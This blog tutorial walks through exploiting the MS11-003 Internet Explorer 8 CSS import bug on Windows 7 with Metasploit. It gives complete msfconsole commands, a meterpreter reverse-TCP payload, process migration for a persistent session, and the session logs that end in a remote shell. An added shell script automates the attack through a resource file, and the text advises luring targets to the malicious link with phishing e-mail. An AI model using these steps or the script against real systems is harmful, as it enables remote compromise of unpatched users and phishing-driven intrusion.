Sunday, 21 June 2015

Hack Windows 7 by using Kali Linux


In this tutorial, we will exploit the "Internet Explorer CSS recursive import memory corruption" vulnerability (MS11-003, CVE-2010-3971) in Internet Explorer 8 on an unpatched Windows 7 Service Pack 1 machine, using Metasploit on Kali Linux, and get a remote shell on the Windows 7 machine. This is a browser (client-side) exploit: Metasploit serves a malicious web page, and a session is created only when the target opens that page in the vulnerable browser. A target that has the MS11-003 update (KB2482017) installed is not affected.

We have the following lab configuration:
Windows 7 IP address: 192.168.122.10
Kali Linux IP address: 192.168.122.115

Perform the following steps on the Kali Linux Machine

1) Start the services.
root@kali:~# service postgresql start
[ ok ] Starting PostgreSQL 9.1 database server: main.

root@kali:~# service metasploit start
[ ok ] Starting Metasploit rpc server: prosvc.
[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.


2) Start metasploit console.
root@kali:~# msfconsole
msf >

3) Select exploit.
msf > use exploit/windows/browser/ms11_003_ie_css_import

4) Select payload. 
msf exploit(ms11_003_ie_css_import) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp


5) View options.
msf exploit(ms11_003_ie_css_import) > show options

Module options (exploit/windows/browser/ms11_003_ie_css_import):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   OBFUSCATE  true             no        Enable JavaScript obfuscation
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.

   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic


6) Set options
msf exploit(ms11_003_ie_css_import) > set URIPATH /
URIPATH => /
msf exploit(ms11_003_ie_css_import) > set LHOST 192.168.122.115
LHOST => 192.168.122.115

7) Execute the exploit.
msf exploit(ms11_003_ie_css_import) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.122.115:4444
msf exploit(ms11_003_ie_css_import) > [*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://192.168.122.115:8080/
[*] Server started.
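Steps 3 to 7 above are typed into msfconsole by hand. As an added example (not part of the original post), the following POSIX shell script writes the equivalent msfconsole resource file and launches it with msfconsole -r, so the lab can be relaunched with a single command. The lab IP addresses and the output file name ms11_003.rc are assumptions taken from the setup above; SRVHOST is pinned to the Kali address instead of 0.0.0.0 so that the URL the server prints is the one to send to the target.

```shell
#!/bin/sh
# Added example, not code from the original post. Generates a msfconsole
# resource script replaying steps 3-7 of the tutorial. Assumed values:
# the lab IPs from the post and the output file name ms11_003.rc.

# is_ipv4 ADDR -> 0 if ADDR is a dotted quad with every octet in 0-255, else 1
is_ipv4() {
    addr="$1"
    # reject anything but digits and dots, leading/trailing dots, empty octets
    case "$addr" in
        *[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    old_ifs="$IFS"; IFS=.
    set -- $addr
    IFS="$old_ifs"
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# make_rc LHOST LPORT SRVPORT OUTFILE -> writes the resource script and
# returns 0, or returns 1 without writing if LHOST is not a valid IPv4 address
make_rc() {
    lhost="$1"; lport="$2"; srvport="$3"; out="$4"
    is_ipv4 "$lhost" || { echo "make_rc: bad LHOST '$lhost'" >&2; return 1; }
    cat > "$out" <<EOF
# Generated by make_rc; run with: msfconsole -q -r $out
use exploit/windows/browser/ms11_003_ie_css_import
set PAYLOAD windows/meterpreter/reverse_tcp
# Listen on the lab interface only, so the printed URL is the one to send
set SRVHOST $lhost
set SRVPORT $srvport
# Serve the page at / so the link carries no random path (as in step 6)
set URIPATH /
set LHOST $lhost
set LPORT $lport
# Run as a background job and do not auto-interact with the first session
exploit -j -z
EOF
}

# Launch only when explicitly asked, e.g.:  sh ms11_003.sh run
if [ "${1:-}" = "run" ]; then
    make_rc 192.168.122.115 4444 8080 ms11_003.rc
    msfconsole -q -r ms11_003.rc
fi
```

The IP validation matters because a typo in LHOST is the most common reason a browser exploit "works" (the page is served) but no session ever comes back: the payload tries to connect to an address nobody is listening on.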


8) The user opens the malicious URL. As we can see, the exploit command has started a web server and printed the link to send to the target. Because SRVHOST is 0.0.0.0, the first URL printed (http://0.0.0.0:8080/) is not usable as-is; the usable one is on the "Local IP" line, http://192.168.122.115:8080/. Because URIPATH was set to /, the link carries no random path. This is the link we have to get the target to open in Internet Explorer 8 (for example via a phishing e-mail), so that the page can exploit their browser.

When the user opens the link, the browser tries to load the page but displays nothing visible. Meanwhile the msfconsole shows the requests arriving (the redirect, the HTML page, the .NET DLL the module uses for its DEP/ASLR bypass, and the CSS that triggers the bug) and the Meterpreter sessions being created, as shown below.

[*] 192.168.122.10   ms11_003_ie_css_import - Received request for "/"
[*] 192.168.122.10   ms11_003_ie_css_import - Sending redirect
[*] 192.168.122.10   ms11_003_ie_css_import - Received request for "/iPKMV.html"
[*] 192.168.122.10   ms11_003_ie_css_import - Sending HTML
[*] 192.168.122.10   ms11_003_ie_css_import - Received request for "/generic-1434889455.dll"
[*] 192.168.122.10   ms11_003_ie_css_import - Sending .NET DLL
[*] 192.168.122.10   ms11_003_ie_css_import - Received request for "/favicon.ico"
[*] 192.168.122.10   ms11_003_ie_css_import - Sending CSS
[*] 192.168.122.10   ms11_003_ie_css_import - Received request for "/\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A"
[*] 192.168.122.10   ms11_003_ie_css_import - Sending CSS
[*] Sending stage (770048 bytes) to 192.168.122.10
[*] Session ID 1 (192.168.122.115:4444 -> 192.168.122.10:49219) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2744)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3376
[*] 192.168.122.10   ms11_003_ie_css_import - Received request for "/generic-1434889455.dll"
[*] 192.168.122.10   ms11_003_ie_css_import - Sending .NET DLL
[*] Sending stage (770048 bytes) to 192.168.122.10
[*] 192.168.122.10   ms11_003_ie_css_import - Received request for "/favicon.ico"
[*] 192.168.122.10   ms11_003_ie_css_import - Sending CSS
[+] Successfully migrated to process
[*] Session ID 2 (192.168.122.115:4444 -> 192.168.122.10:49221) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3404)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3532
[*] 192.168.122.10   ms11_003_ie_css_import - Received request for "/generic-1434889455.dll"
[*] 192.168.122.10   ms11_003_ie_css_import - Sending .NET DLL
[*] Sending stage (770048 bytes) to 192.168.122.10
[+] Successfully migrated to process
[*] Session ID 3 (192.168.122.115:4444 -> 192.168.122.10:49224) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3664)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3808
[*] 192.168.122.10   ms11_003_ie_css_import - Received request for "/generic-1434889455.dll"
[*] 192.168.122.10   ms11_003_ie_css_import - Sending .NET DLL
[*] Sending stage (770048 bytes) to 192.168.122.10
[+] Successfully migrated to process
[*] Session ID 4 (192.168.122.115:4444 -> 192.168.122.10:49226) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3848)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3984
[+] Successfully migrated to process

As we can see above, the InitialAutoRunScript runs migrate -f, which migrates the payload out of iexplore.exe into a freshly spawned notepad.exe. This step is essential for a persistent session: the exploited browser process may crash after exploitation or be closed by the user, and either would kill a session living inside it, but the migrated session stays alive. Note also that this single page load produced four sessions: the browser re-requested the .NET DLL and CSS several times, and each request chain triggered the exploit again and opened a new session. Any one of them is enough.

9) View the sessions.
msf exploit(ms11_003_ie_css_import) > sessions -i

Active sessions
===============

  Id  Type                   Information                  Connection
  --  ----                   -----------                  ----------
  1   meterpreter x86/win32  shabbir-PC\ali @ SHABBIR-PC  192.168.122.115:4444 -> 192.168.122.10:49219 (192.168.122.10)
  2   meterpreter x86/win32  shabbir-PC\ali @ SHABBIR-PC  192.168.122.115:4444 -> 192.168.122.10:49221 (192.168.122.10)
  3   meterpreter x86/win32  shabbir-PC\ali @ SHABBIR-PC  192.168.122.115:4444 -> 192.168.122.10:49224 (192.168.122.10)
  4   meterpreter x86/win32  shabbir-PC\ali @ SHABBIR-PC  192.168.122.115:4444 -> 192.168.122.10:49226 (192.168.122.10)


10) Interact with one of the sessions and get a shell on the remote machine.
msf exploit(ms11_003_ie_css_import) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : SHABBIR-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32

meterpreter > getuid
Server username: shabbir-PC\ali

meterpreter > shell
Process 2704 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\ali\Desktop>

7 comments:

  1. I sent that link through mail.
    After switching to my Windows machine I opened the browser and clicked on that link.
    A new tab opens and shows
    "The site can't be reached" error.
    What could be the problem?
  3. We will be getting a reverse TCP connection from the victim machine by using a small backdoor: hack Windows 7 using Metasploit.